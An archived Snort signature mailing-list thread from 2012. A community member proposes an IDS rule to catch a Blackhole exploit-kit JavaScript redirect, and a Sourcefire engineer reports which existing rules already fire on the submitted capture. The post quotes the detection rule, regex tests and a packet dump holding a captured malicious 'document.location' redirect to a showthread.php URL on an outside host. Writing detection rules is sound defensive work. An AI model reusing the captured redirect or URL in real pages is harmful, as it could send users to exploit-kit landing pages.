Snort mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Proposed Signature - "COMMUNITY SPECIFIC-THREATS Blackhole Terse JavaScript hex 16 byte document.location JavaScript redirect to showthread.php"

From: Joel Esler <jesler () sourcefire com>
Date: Tue, 13 Mar 2012 11:43:32 -0400
Nathan,

Thanks for your submission. I took the pcap you sent me and ran it through
our ruleset and received the following alerts:

1:21492:5       SPECIFIC-THREATS Blackhole landing page with specific
structure - catch     Alerts: 1
1:1478:12       WEB-CGI swc access
      Alerts: 1
1:6390:7        SPYWARE-PUT Adware esyndicate runtime detection - ads popup
     Alerts: 1
1:21548:1       BOTNET-CNC Cutwail landing page connection attempt
      Alerts: 1

A few others alerted as well, but I removed them as they were set to
"noalert"  (I remove "flowbits:noalert;" from my testing suite so I can see
everything.)

So an additional rule may not add value.  However, looking at your pcap
gave me an idea to modify 21492.  Trying that now.

J

On Tue, Mar 13, 2012 at 11:01 AM, Community Proposed
<lists () packetmail net>wrote:


I'm having issues getting this to fire, and I've tried a few permutations,
perhaps I'm simply overlooking something stupid.  I believe you'll get the
gist of the signature and I would appreciate feedback/changes:

I had also tried, without file_data, content:"|0d 0a 0d
0a|document.location="; fast_pattern;

alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"COMMUNITY
SPECIFIC-THREATS Blackhole Terse JavaScript hex 16 byte document.location
JavaScript redirect to showthread.php"; flow:to_client,established;
file_data;
content:"document.location="; depth:18; fast_pattern;
content:"/showthread.php?t="; distance:0;

pcre:"/document.location=[^\r\n\x3b]+\/showthread.php\?t=[a-f0-9]{16}[^\r\n]\x3b/";
classtype:trojan-activity; sid:436520770; rev:1;)

$ pcretest
PCRE version 8.02 2010-03-19

 re>

/^document.location=[^\r\n\x3b]+\/showthread.php\?t=[a-f0-9]{16}[^\r\n]\x3b/
data>
document.location='
http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff&apos;;
 0:
document.location='
http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff&apos;;
data>
document.location="
http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff";;
 0:
document.location="
http://proxiwash.fr:8080/showthread.php?t=d7ad916d1c0396ff";;
data> document.location="http://localhost";; alert("Hello from
showthread.php?t=d7ad916d1c0396ff");
No match
data> ^C

09:16:26.964654 IP 187.45.193.142.80 > a.b.c.d.2968: P 1:386(385) ack 376
win
6432
       0x0000:  4500 01a9 6eb9 4000 2c06 da8e bb2d c18e  E...n.@.,....-..
       0x0010:  0ad9 7c72 0050 0b98 1333 57ff d926 a6f6  ..|r.P...3W..&..
       0x0020:  5018 1920 0d8c 0000 4854 5450 2f31 2e31  P.......HTTP/1.1
       0x0030:  2032 3030 204f 4b0d 0a53 6572 7665 723a  .200.OK..Server:
       0x0040:  2041 7061 6368 650d 0a4c 6173 742d 4d6f  .Apache..Last-Mo
       0x0050:  6469 6669 6564 3a20 5475 652c 2031 3320  dified:.Tue,.13.
       0x0060:  4d61 7220 3230 3132 2031 333a 3135 3a32  Mar.2012.13:15:2
       0x0070:  3620 474d 540d 0a43 6f6e 7465 6e74 2d54  6.GMT..Content-T
       0x0080:  7970 653a 2061 7070 6c69 6361 7469 6f6e  ype:.application
       0x0090:  2f78 2d6a 6176 6173 6372 6970 740d 0a43  /x-javascript..C
       0x00a0:  6163 6865 2d43 6f6e 7472 6f6c 3a20 4e6f  ache-Control:.No
       0x00b0:  2d43 6163 6865 0d0a 5072 6167 6d61 3a20  -Cache..Pragma:.
       0x00c0:  6e6f 2d63 6163 6865 0d0a 436f 6e74 656e  no-cache..Conten
       0x00d0:  742d 4c65 6e67 7468 3a20 3739 0d0a 4461  t-Length:.79..Da
       0x00e0:  7465 3a20 5475 652c 2031 3320 4d61 7220  te:.Tue,.13.Mar.
       0x00f0:  3230 3132 2031 343a 3136 3a32 3620 474d  2012.14:16:26.GM
       0x0100:  540d 0a58 2d56 6172 6e69 7368 3a20 3137  T..X-Varnish:.17
       0x0110:  3738 3333 3739 3431 2031 3737 3833 3334  78337941.1778334
       0x0120:  3534 360d 0a41 6765 3a20 3332 0d0a 5669  546..Age:.32..Vi
       0x0130:  613a 2031 2e31 2076 6172 6e69 7368 0d0a  a:.1.1.varnish..
       0x0140:  436f 6e6e 6563 7469 6f6e 3a20 6b65 6570  Connection:.keep
       0x0150:  2d61 6c69 7665 0d0a 0d0a 646f 6375 6d65  -alive....docume
       0x0160:  6e74 2e6c 6f63 6174 696f 6e3d 2768 7474  nt.location='htt
       0x0170:  703a 2f2f 7072 6f78 6977 6173 682e 6672  p://proxiwash.fr
       0x0180:  3a38 3038 302f 7368 6f77 7468 7265 6164  :8080/showthread
       0x0190:  2e70 6870 3f74 3d64 3761 6439 3136 6431  .php?t=d7ad916d1
       0x01a0:  6330 3339 3666 6627 3b                   c0396ff';

Thanks,
Nathan





-- 
Joel Esler
Senior Research Engineer, VRT
OpenSource Community Manager
Sourcefire

------------------------------------------------------------------------------
Keep Your Developer Skills Current with LearnDevNow!
The most comprehensive online learning library for Microsoft developers
is just $99.99! Visual Studio, SharePoint, SQL - plus HTML5, CSS3, MVC3,
Metro Style Apps, more. Free future releases when you subscribe now!
http://p.sf.net/sfu/learndevnow-d2d
_______________________________________________
Snort-sigs mailing list
Snort-sigs () lists sourceforge net
https://lists.sourceforge.net/lists/listinfo/snort-sigs
http://www.snort.org


Please visit http://blog.snort.org for the latest news about Snort!
Previous By Date Next
Previous By Thread Next

Current thread: